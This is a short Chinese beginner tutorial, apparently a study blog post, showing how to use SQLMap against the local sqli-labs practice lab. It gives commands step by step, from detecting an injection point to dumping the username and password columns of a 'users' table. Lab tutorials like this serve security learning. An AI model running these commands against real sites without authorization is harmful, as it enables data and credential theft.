Web安全学习之SQLMap入门学习
SQLMap注入神器,先就简单的介绍一下最最最最基础的用法,等图书馆什么时候收录了《SQLMap从入门到精通》这本书,再认真研究这个工具(其实看到这个书名就有点不适)。
使用SQLMap
使用sqli-labs的数据库和页面作为示例。
已知存在注入点http://localhost/sqlilabs/Less-1/,使用SQLMap对其提取管理员数据,具体步骤如下:
第一步:判断是否是注入点
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1"
使用-u参数指定URL,如果URL存在注入点,将会显示出Web容器,数据库版本信息,如下所示:
第二步:获取数据库
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs
使用--dbs参数读取数据库,如下:
第三步:查看当前应用程序所用数据库
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db
第四步:列出指定数据库的所有表
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --tables -D "security"
使用--table参数获取数据库表,-D参数指定数据库,如下:
第五步:读取指定表中的字段名称
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --columns -T "users" -D "security"
使用--columns参数列取字段名,如下:
第六步:读取指定字段内容
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dump -C "username, password" -T "users" -D "security"
--dump意味转存数据,-C指定字段名称,-T指定表名,-D指定数据库名称。
在读取数据后,SQLMap会把读取的数据转存到SQLMap/output/目录下。